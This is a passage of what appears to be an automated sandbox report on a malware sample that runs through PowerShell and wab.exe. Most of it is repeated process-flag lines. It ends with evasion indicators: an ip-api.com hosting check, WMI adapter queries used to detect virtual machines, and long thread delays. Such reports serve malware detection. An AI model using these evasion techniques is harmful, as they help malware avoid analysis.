            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

            Malware Analysis System Evasion

            barindex
            Check if machine is in data center or colocation facility
            Source: global trafficHTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive
            Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)
            Source: C:\Program Files (x86)\Windows Mail\wab.exeWMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_NetworkAdapterConfiguration
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 2DF0000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 22F60000 memory reserve | memory write watchJump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeMemory allocated: 22DE0000 memory reserve | memory write watchJump to behavior
            Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 922337203685477Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 600000Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599875Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599766Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599657Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599532Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599407Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599282Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599157Jump to behavior
            Source: C:\Program Files (x86)\Windows Mail\wab.exeThread delayed: delay time: 599046Jump to behavior
